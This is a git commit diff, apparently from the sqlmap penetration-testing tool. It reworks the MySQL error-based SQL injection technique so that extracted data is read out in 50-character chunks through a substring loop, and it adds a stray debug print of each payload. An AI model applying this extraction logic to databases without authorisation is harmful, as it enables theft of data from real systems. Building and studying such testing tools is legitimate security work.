first commit with mysql/error/substringing

2024-11-22 17:46:37 +03:00 · 2011-02-08 16:23:33 +00:00 · 2011-02-08 16:23:33 +00:00 · 37f7001143
commit 37f7001143
parent c3eb82e60b
2 changed files with 42 additions and 25 deletions
--- a/lib/core/settings.py
+++ b/lib/core/settings.py
@ -248,7 +248,7 @@ MAX_RATIO = 1.0
 URI_INJECTION_MARK_CHAR = '*'

 # Maximum length used for retrieving data over MySQL error based payload due to "known" problems with longer result strings
-MYSQL_ERROR_TRIM_LENGTH = 100
+MYSQL_ERROR_CHUNK_LENGTH = 50

 # Do not unescape the injected statement if it contains any of the following SQL words
 EXCLUDE_UNESCAPE = ("WAITFOR DELAY ", " INTO DUMPFILE ", " INTO OUTFILE ", "CREATE ", "BULK ", "EXEC ", "RECONFIGURE ", "DECLARE ")
--- a/lib/techniques/error/use.py
+++ b/lib/techniques/error/use.py
@ -29,7 +29,7 @@ from lib.core.enums import DBMS
 from lib.core.enums import EXPECTED
 from lib.core.enums import PAYLOAD
 from lib.core.settings import FROM_TABLE
-from lib.core.settings import MYSQL_ERROR_TRIM_LENGTH
+from lib.core.settings import MYSQL_ERROR_CHUNK_LENGTH
 from lib.core.unescaper import unescaper
 from lib.request.connect import Connect as Request
 from lib.utils.resume import resume
@ -39,12 +39,14 @@ reqCount = 0
 def __oneShotErrorUse(expression, field):
    global reqCount

+    offset = 1
+    retVal = None
+
+    while True:
        check = "%s(?P<result>.*?)%s" % (kb.misc.start, kb.misc.stop)
        nulledCastedField = agent.nullAndCastField(field)
-
        if Backend.getIdentifiedDbms() == DBMS.MYSQL:
-        # Fix for MySQL odd behaviour ('Subquery returns more than 1 row')
-        nulledCastedField = nulledCastedField.replace("AS CHAR)", "AS CHAR(%d))" % MYSQL_ERROR_TRIM_LENGTH)
+            nulledCastedField = queries[Backend.getIdentifiedDbms()].substring.query % (nulledCastedField, offset, MYSQL_ERROR_CHUNK_LENGTH)

        # Forge the error-based SQL injection request
        vector = kb.injection.data[PAYLOAD.TECHNIQUE.ERROR].vector
@ -54,6 +56,7 @@ def __oneShotErrorUse(expression, field):
        injExpression = unescaper.unescape(injExpression)
        injExpression = query.replace("[QUERY]", injExpression)
        payload = agent.payload(newValue=injExpression)
+        print payload

        # Perform the request
        page, headers = Request.queryPage(payload, content=True)
@ -65,9 +68,23 @@ def __oneShotErrorUse(expression, field):
                or extractRegexResult(check, listToStrValue(headers.headers \
                if headers else None), re.DOTALL | re.IGNORECASE)

-    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(output)))
+        if Backend.getIdentifiedDbms() == DBMS.MYSQL:
+            if offset == 1:
+                retVal = output
+            else:
+                retVal += output if output else ''

-    return output
+            if not (output and len(output) >= MYSQL_ERROR_CHUNK_LENGTH):
+                break
+            else:
+                offset += MYSQL_ERROR_CHUNK_LENGTH
+        else:
+            retVal = output
+            break
+
+    dataToSessionFile("[%s][%s][%s][%s][%s]\n" % (conf.url, kb.injection.place, conf.parameters[kb.injection.place], expression, replaceNewlineTabs(retVal)))
+
+    return retVal

 def __errorFields(expression, expressionFields, expressionFieldsList, expected=None, num=None, resumeValue=True):
    outputs = []